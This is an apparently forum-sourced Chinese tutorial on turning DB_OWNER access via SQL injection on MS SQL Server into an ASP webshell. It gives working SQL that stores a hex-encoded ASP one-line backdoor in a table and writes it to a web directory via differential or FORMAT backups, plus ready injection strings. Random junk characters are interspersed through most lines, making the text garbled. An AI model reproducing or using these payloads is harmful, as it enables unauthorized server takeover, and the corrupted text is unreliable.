DB_OWNER权限得到webshell的两点改进:8 S; _0 p/ u( b( W1 D5 _! X
2 J, I% ]' n$ f, \
减少备份文件大小,得到可执行的webshell成功率提高不少: m( R8 [7 }' P; ?
一利用差异备份
( ~7 |! h$ @) p8 B- \" X加一个参数WITH DIFFERENTIAL
5 q {; S6 h0 U& K! v$ C5 p+ W" v0 x% }9 i7 @% _3 ?- {
1
0 s: E0 W2 v0 I7 c0 n26 m/ Q0 U9 R; {8 ^
3
& j0 `# \7 p6 G, [4% Z' B3 L% ]6 S9 Y& q: e
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
, \6 @& @* p" I. zcreate table [dbo].[xiaolu] ([cmd] [image]);
# T% v/ p' u; Tinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)6 n( A7 \. Z- J$ @; X- H( Y" Y
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL 8 X0 o4 r; w' j
8 A, l& |: U, H u5 O7 l) X
二利用完全FORMAT
9 }3 M! N' A/ M# H9 c加一个参数WITH FROMAT
% j+ G& T3 A8 y) U' z1 s有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以7 `! E$ s5 T: g2 |* w
4 @* v& c7 H6 K; `" q+ e$ w% {1
7 n8 ~8 O9 q* x% u6 a# }2
( K' S6 z7 v8 k8 t4 t9 m+ [3
: s4 ~9 \6 x1 A8 O& Z8 J2 h7 ]! y) D45 K' X( ~8 T9 d A/ B( ]7 U" ]
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
% u/ {: o) y# n1 R/ ?: Screate table [dbo].[xiaolu] ([cmd] [image]);
4 @0 S. ^4 ^) G- ?* f% Oinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)3 ]5 _4 T: c0 S2 `4 |) ]4 D
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
9 b+ h4 ?0 }* L1 }5 ~
) V% p+ o8 O/ j总的来说就是那么简单几句,下面以备份数据库model为例子
7 t$ N+ v6 U+ t6 [1' h1 p; w( x* r' C, K( V2 r
3 `* B' e7 r1 j% U. j1
" `2 w3 Z9 Y3 _ id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>') / x4 Q2 C# }8 h- o, z) R0 c8 W
% {- k& L" h) c0 o0 f
2
; |6 G3 d$ ~, i* c' p- ^
/ D" z8 x' f3 h0 {15 A: A: }: }: Y. z! E; @ k2 W
id=1;backup database model to disk='你的路径‘ with differential,format;--
2 d: Z3 q: P) a P3 A3 M9 q$ p' G2 N |